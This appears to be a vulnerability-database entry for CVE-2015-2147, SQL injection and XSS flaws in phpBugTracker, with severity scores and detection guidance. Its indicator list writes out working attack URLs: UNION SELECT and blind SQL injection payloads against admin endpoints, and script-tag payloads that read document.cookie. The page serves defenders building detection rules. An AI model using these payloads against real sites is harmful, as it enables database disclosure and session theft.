CVE-2015-2147
published 2017-10-06CVE-2015-2147: Multiple SQL injection vulnerabilities in Issuetracker phpBugTracker before 1.7.0 allow remote attackers to execute arbitrary SQL commands via unspecified…
PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
1.59%
72.7th percentile
Multiple SQL injection vulnerabilities in Issuetracker phpBugTracker before 1.7.0 allow remote attackers to execute arbitrary SQL commands via unspecified parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbugtracker_project | phpbugtracker | <= 1.6.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+↗
urlhttp://{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+↗
urlhttp://{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+↗
urlhttp://{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+↗
urlhttp://{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+↗
urlhttp://{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1↗
urlhttp://{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1↗
- →Detect SQL injection attempts against phpBugTracker admin endpoints by monitoring for UNION SELECT payloads in query parameters: id, status_id, database_id, site_id, group_id, and project. ↗
- →Detect blind SQL injection via time-based SLEEP() payloads in the group_id parameter of /admin/group.php. ↗
- →Detect reflected XSS attempts in the use_js parameter of /admin/user.php and /admin/group.php, looking for script tag injection patterns such as %3Cscript%3E. ↗
- →Monitor GET requests to phpBugTracker admin paths (/admin/project.php, /admin/group.php, /admin/status.php, /admin/database.php, /admin/site.php, /admin/user.php, /admin/os.php, /bug.php) for SQL metacharacters (single quotes, UNION, SELECT, SLEEP, substring) in query string parameters. ↗
- →The bug.php SQLi via the project parameter was previously assigned CVE-2004-1519, indicating a long-standing unpatched injection point; treat any UNION SELECT in /bug.php?op=add&project= as high-confidence exploitation. ↗
- ·All attack URLs use {TARGET} as a placeholder; replace with the actual host when deploying detection signatures. ↗
- ·Multiple vulnerability classes are present (SQLi, stored XSS, reflected XSS, CSRF); detection rules should be scoped per vulnerability type to avoid false-positive overlap. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2017-10-06
Published